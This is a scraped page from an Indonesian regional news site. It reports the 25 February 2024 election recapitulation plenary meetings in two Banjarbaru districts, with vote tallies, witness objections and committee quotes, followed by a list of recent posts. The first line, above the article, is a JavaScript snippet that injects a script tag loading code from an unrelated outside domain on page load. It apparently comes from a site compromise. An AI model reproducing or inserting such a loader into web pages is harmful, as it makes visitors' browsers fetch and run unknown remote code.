(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kota Banjarbaru

Dua Kecamatan di Banjarbaru Susul Perampungan Rapat Pleno Rekapitulasi Pemilu 2024


KANALKALIMANTAN.COM, BANJARBARU – Dua kecamatan di Kota Banjarbaru baru saja selesai melaksanakan rapat pleno rekapitulasi hasil penghitungan suara, Minggu (25/2/2024).

Pelaksanaan rapat pleno terbuka pertama dilakukan oleh Panitia Perhitungan Kecamatan (PPK) Liang Anggang sejak pukul 09.00 Wita dan berakhir sekitar pukul 15.00 Wita.

Muhammad Muhransyah, Ketua PPK Liang Anggang mengatakan, secara keseluruhan rapat berjalan dengan kondusif meski ada beberapa sanggahan yang sempat disampaikan para saksi partai politik (parpol) yang berhadir.

Baca juga: Kasus Kekerasan Seksual Meningkat, Anak Darurat Konten Pornografi

Rapat pleno terbuka rekapitulasi penghitungan suara oleh PPK Banjarbaru Selatan, Minggu (25/2/2024) sore. Foto: wanda

“Secara garis besar berjalan dengan lancar, hanya saja tadi memang ada tanggapan sedikit atas perolehan suara DPRD kota, namun itu sudah kita selesaikan dengan berpedoman pada C-Hasil yang kita turut perlihatkan dari Sirekap web,” ucap Muhransyah saat diwawancarai, Minggu (25/2/2024).

Selama proses perhitungan hasil oleh PPK, disebutkannya ada dilakukan pencocokan atau sinkronisasi data kembali yang didatangkan dari dua orang saksi PAN.

“Untuk suara PAN kami memang kami melakukan pencocokan data atau sinkronisasi data terkait didatangkan dua saksi yang memohon kepada kami untuk diakomodir karena ingin menyampaikan tanggapan,” jelas dia.

Atas pertimbangan PPK dan rekomendasi Panwascam, pihaknya pun mengakomodir dua saksi yang memberikan tanggapan tersebut.

Baca juga: Pemancing Diduga Tenggelam, Tim Lakukan Pencarian di Sungai Riam Kiwa

Proses sinkronisasi data pun berjalan dengan lancar dengan seluruh pihak menyetujui daripada hasil yang telah ditetapkan.

“Untuk rekapitulasi kita lakukan selama lima hari berakhir pada hari Kamis kemarin, kita sambung sinkronisasi data selama dua hari dan dan kemarin juga logistik sudah dikembalikan ke gudang untuk itu hari ini kami melakukan rapat pleno terbuka,” jelasnya.

Mengenai hasil perolehan suara pasangan calon presiden dan wakil presiden yang unggul di Kecamatan Liang Anggang, pasangan nomor urut 02 kembali menduduki peringkat pertama dengan suara berjumlah 16.000 suara.

Sedangkan untuk pasangan calon nomor urut 01 memperoleh suara sebanyak 7.447. Dan nomor urut 03 memperoleh suara sebanyak 2.371.

Baca juga: Amphibious M3I, Ranpur Kostrad Jadi Perhatian di IIMS 2024

Sementara untuk suara parpol tertinggi di Kecamatan Liang Anggang diduduki oleh Golkar dengan jumlah suara 3.975.

Pada hari yang sama PPK Banjarbaru Selatan mulai melaksanakan rapat pleno terbuka di pukul 13.30 Wita hingga berakhir sebelum waktu Magrib.

Berbeda dengan PPK Liang Anggang, rapat pleno terbuka di Banjarbaru Selatan berjalan tanpa ada sanggahan dari para saksi parpol yang berhadir.

“Alhamdulillah tidak ada kendala. Untuk data kita dari Sirekap dan data manual dari para saksi parpol semua disetujui clear semua, tidak ada keberataan ataupun sanggahan atas hasil perhitungan atau pun perbedaan data tidak ditemukan,” ungkap
Ketua PPK Banjarbaru Selatan, Taufikurrahman, Minggu (25/2/2024) sore.

Baca juga: RAT KSP Kopdit Satui Mandiri Dihadiri Diskop UKM Kalsel

Dengan tidak ditemukan kendala selama proses, kata dia, membuat rapat pleno terbuka ini dapat berjalan dengan waktu yang lebih cepat dari prediksi.

“Insya Allah akan berlanjut ke pleno di tingkat kota karena kami berupaya keras untuk tidak menyisakan permasalahan sampai ke kota,” tuntas dia.

Adapun untuk hasil perolehan suara paslon maupun caleg untuk di Kecamatan Banjarbaru Selatan hingga malam ini masih dilakukan penggandaan berkas hasil perhitungan oleh PPK kepada saksi. (Kanalkalimantan.com/wanda)

Reporter : wanda
Editor : bie


Muhammad Andi

Recent Posts

Orangtua Pusing, ‘Bermewah-mewahan’ Perpisahan Anak Sekolah di Banjarbaru

Kadisdik: Silakan Perpisahan di Sekolah dan Dilakukan dengan Sederhana Read More

4 jam ago

Bappedalitbang Banjar Gelar Rapat Pembahasan Data Indikator Makro Pembangunan RPJPD

KANALKALIMANTAN.COM, MARTAPURA – Badan Perencanaan Pembangunan Daerah, Penelitian dan Pengembangan (Bappedalitbang) Kabupaten Banjar melaksanakan rapat Pembahasan… Read More

5 jam ago

Pergantian Perwira di Polres Banjarmasin, Ini Nama dan Jabatannya

KANALKALIMANTAN.COM, BANJARMASIN - Sejumlah perwira menengah (Pamen) dan perwira pertama (Pama) di lingkungan Kepolisian Resor… Read More

5 jam ago

O2SN dan FLS2N 2024 SD MI Tingkat Kabupaten Kapuas Digelar

KANALKALIMANTAN.COM, KUALA KAPUAS - Ratusan pelajar tingkat SD/MI di Kabupaten Kapuas antusias mengikuti upacara pembukaan… Read More

5 jam ago

Bangun Posyandu di Lokasi TMMD Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Pembangunan Pos Pelayanan Terpadu (Posyandu) tak luput dari sasaran Satgas TNI Manunggal… Read More

5 jam ago

Kelurahan Guntung Manggis Membidik Juara Kampung Keluarga Berkualitas Nasional

KANALKALIMANTAN.COM, BANJARBARU - Kampung Keluarga Berkualitas (KB) di Kelurahan Guntung Manggis menerima kunjungan Tim Penilai… Read More

5 jam ago

This website uses cookies.